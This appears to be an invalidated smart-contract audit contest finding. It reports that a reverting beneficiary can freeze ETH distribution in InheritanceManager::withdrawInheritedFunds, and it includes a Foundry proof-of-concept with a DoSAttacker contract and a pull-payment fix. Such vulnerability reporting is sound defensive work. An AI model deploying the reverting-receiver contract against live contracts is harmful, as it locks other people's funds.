Tags: Beginner Friendly, Solidity
100 EXP
Submission Details
Severity: high
Invalid

In `InheritanceManager::withdrawInheritedFunds`, a single beneficiary that is a contract reverting on ETH receipt can Denial-of-Service (DoS) the ETH distribution for every beneficiary.

Description: `InheritanceManager::withdrawInheritedFunds` loops over the `beneficiaries` array and pushes an equal share of the contract's ETH balance to each entry with a low-level `call`, then `require`s that the call succeeded.
Because the loop is all-or-nothing, if any beneficiary is a contract whose `receive`/`fallback` reverts (or simply has no payable entry point), the `call` returns `false`, the `require` reverts, and the whole transaction is rolled back. No beneficiary receives anything, and the ETH stays locked in the contract for as long as that beneficiary remains in the list.

```solidity
// Takes the asset to distribute; address(0) selects the ETH branch shown here.
function withdrawInheritedFunds(address _asset) external {
    ...
    for (uint256 i = 0; i < divisor; i++) {
        address payable beneficiary = payable(beneficiaries[i]);
@>      (bool success,) = beneficiary.call{value: amountPerBeneficiary}("");
        // One failed transfer reverts the entire loop, undoing every earlier payout.
        require(success, "something went wrong");
    }
    ...
}
```

Impact: One reverting beneficiary blocks the ETH payout to all beneficiaries. There is no partial distribution and no way for the honest beneficiaries to receive their share until the offending entry is removed from `beneficiaries`, so the inherited ETH is effectively frozen.

Proof of Concept: Add an attacker contract whose `receive` reverts, then add the test below to the existing Foundry test contract (it relies on that suite's fixtures `im`, `owner` and `beneficiary1..3`) to simulate the scenario.

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.26;

// Beneficiary that refuses ETH: the low-level call in withdrawInheritedFunds
// returns success == false and the require reverts the whole distribution.
contract DoSAttacker {
    receive() external payable {
        revert();
    }
}

// Place inside the existing InheritanceManager test contract (a forge-std Test),
// which already provides `im`, `owner` and `beneficiary1..3` in setUp().
function test_DoS_withdrawInheritedFunds() public {
    // create hack contract
    DoSAttacker attacker = new DoSAttacker();
    vm.deal(address(im), 1 ether);

    vm.startPrank(owner);
    im.addBeneficiery(beneficiary1); // `addBeneficiery` is the contract's own (misspelled) name
    im.addBeneficiery(beneficiary2);
    im.addBeneficiery(beneficiary3);
    im.addBeneficiery(address(attacker));
    vm.stopPrank();

    vm.warp(im.getDeadline());
    im.inherit();

    // The attacker's revert bubbles up as the require message; nobody is paid.
    vm.expectRevert("something went wrong");
    im.withdrawInheritedFunds(address(0));
}
```

Recommended Mitigation:
Redesign the withdrawal as a pull payment: have `withdrawInheritedFunds` only record each beneficiary's share in storage (no external calls), and let every beneficiary claim its own share in a separate call. A receiver that reverts then fails only its own claim and cannot block the others. If the push loop must be kept, at minimum do not `require(success)`; instead record the unpaid amount for that beneficiary so it can be claimed later, and continue the loop.
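The pull-payment redesign suggested above, as an added illustration. This is not the audited `InheritanceManager`; the contract, function and error names (`PullPaymentInheritance`, `distributeInheritedEth`, `claimEth`, `ethOwed`) are assumptions for the example, and the deadline/`inherit()` logic is a minimal stand-in for the real contract's.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity 0.8.26;

/// Illustrative pull-payment version of the ETH distribution.
/// Not the audited contract: names and the inherit/deadline stand-in are assumed.
contract PullPaymentInheritance {
    address[] public beneficiaries;
    uint256 public immutable deadline;
    bool public isInherited;
    bool private ethDistributed;

    /// Share each beneficiary may pull. Recorded in storage, never pushed.
    mapping(address => uint256) public ethOwed;

    error DeadlineNotReached();
    error NotYetInherited();
    error AlreadyDistributed();
    error NoBeneficiaries();
    error NothingToClaim();
    error TransferFailed();

    event EthClaimed(address indexed beneficiary, uint256 amount);

    constructor(address[] memory _beneficiaries, uint256 _deadline) payable {
        beneficiaries = _beneficiaries;
        deadline = _deadline;
    }

    receive() external payable {}

    /// Stand-in for the real inherit(): flips the wallet into inherited mode
    /// once the deadline has passed.
    function inherit() external {
        if (block.timestamp < deadline) revert DeadlineNotReached();
        isInherited = true;
    }

    /// Step 1 (replaces the push loop): snapshot every share in storage.
    /// No external calls happen here, so no beneficiary can make it revert.
    function distributeInheritedEth() external {
        if (!isInherited) revert NotYetInherited();
        if (ethDistributed) revert AlreadyDistributed();
        uint256 divisor = beneficiaries.length;
        if (divisor == 0) revert NoBeneficiaries();
        ethDistributed = true;
        uint256 amountPerBeneficiary = address(this).balance / divisor;
        for (uint256 i = 0; i < divisor; i++) {
            // += so a duplicate entry in the list is credited twice rather than overwritten
            ethOwed[beneficiaries[i]] += amountPerBeneficiary;
        }
    }

    /// Step 2: each beneficiary pulls only its own share. A receiver that
    /// reverts fails only its own claim; the others are unaffected.
    /// Checks-effects-interactions: the owed amount is zeroed before the call,
    /// so a re-entering receiver finds nothing left to claim.
    function claimEth() external {
        uint256 amount = ethOwed[msg.sender];
        if (amount == 0) revert NothingToClaim();
        ethOwed[msg.sender] = 0;
        (bool success,) = msg.sender.call{value: amount}("");
        if (!success) revert TransferFailed();
        emit EthClaimed(msg.sender, amount);
    }
}
```

With this shape, the `DoSAttacker` from the proof of concept above can still be added as a beneficiary, but its reverting `receive` only makes its own `claimEth()` fail; `distributeInheritedEth()` succeeds, and the three honest beneficiaries each pull 0.25 ether independently. The attacker's unclaimed share simply stays in `ethOwed` rather than blocking anyone.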

Updates

Lead Judging Commences

0xtimefliez Lead Judge 4 months ago
Submission Judgement Published
Invalidated
Reason: Non-acceptable severity
